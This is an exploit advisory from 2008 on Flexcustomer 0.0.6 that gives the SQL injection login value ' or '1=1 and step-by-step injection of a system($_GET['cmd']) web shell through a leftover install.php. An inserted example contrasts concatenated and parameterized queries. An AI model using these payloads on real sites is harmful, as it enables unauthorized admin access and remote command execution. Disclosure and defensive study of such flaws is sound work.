
Flexcustomer 0.0.6 Administrative Login Bypass

Posted Dec 31, 2008
Authored by Osirys | Site y-osirys.com

Flexcustomer version 0.0.6 suffers from an administrative login bypass and a possible PHP data writing vulnerability.

tags | exploit, php, vulnerability, bypass
SHA-256 | be5428ee6751c2505cae283d6af7c94558a08377ba31b39d035107f838c9a806

[START]

####################################################################################################################
[0x01] Information:

Script : Flexcustomer
Download : http://www.hotscripts.com/jump.php?listing_id=25331&jump_type=1
Vulnerability : Admin Login Bypass / Possible PHP code writing
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org


####################################################################################################################
[0x02] Bug: [Admin Login Bypass]
######

Bug: /[path]/admin/usercheek.php

[CODE]

<?php
session_start();

if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
$results = $db->select($sql);

[/CODE]

[!FIX] Escape $checkuser and $checkpass in $sql query.


[!] EXPLOIT: /[path]/admin/
Put as username and password: ' or '1=1
You will log in as admin
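
An added example, not part of the original advisory and not Flexcustomer's code: the concatenated query from the excerpt above beside a parameterized version, run against a constructed in-memory SQLite table. The function names, the sample account and the use of password_hash()/password_verify() are assumptions for illustration; it needs the pdo_sqlite extension.

```php
<?php
// Added example: constructed schema and data, not Flexcustomer's own code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE useradmin (adminid INTEGER PRIMARY KEY, username TEXT, password TEXT)');

// Constructed account; the password is stored as a hash (assumption, the
// advisory's query compares the password inside the WHERE clause).
$ins = $pdo->prepare('INSERT INTO useradmin (username, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Concatenated query, as in the advisory's excerpt: the input becomes SQL syntax.
function login_concatenated(PDO $pdo, string $user, string $pass): bool
{
    $sql = "select username,adminid from useradmin where username='$user' and password='$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// Parameterized query: the input is bound as data, and the password is
// checked against the stored hash in PHP instead of in the WHERE clause.
function login_prepared(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT adminid, password FROM useradmin WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password']);
}

$input = "' or '1=1"; // the value given in the advisory
var_dump(login_concatenated($pdo, $input, $input));       // quote closes the literal
var_dump(login_prepared($pdo, $input, $input));           // same input, bound as data
var_dump(login_prepared($pdo, 'admin', 'correct horse')); // legitimate login
```

The first call shows the bypass the advisory describes; the second shows the same input rejected once it can no longer change the query's structure.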

####################################################################################################################
[0x03] Bug: [Possible PHP data writing]
######

This is not a real bug, but it could become one if the administrator doesn't delete the install.php file.
In fact, data that we put in the /[path]/admin/install.php forms will be saved in a .php file.
So, if install.php is not deleted, we can inject PHP code, and this bug can become an RCE vulnerability.

[!] EXPLOIT:
1) Go to: /[path]/admin/install.php
2) Put as Database Name this simple PHP code: ";system($_GET['cmd']);$a = "k
3) Fill in the other form and press Next
4) Execute your cmd: /[path]/const.inc.php?cmd=id

####################################################################################################################

[/END]
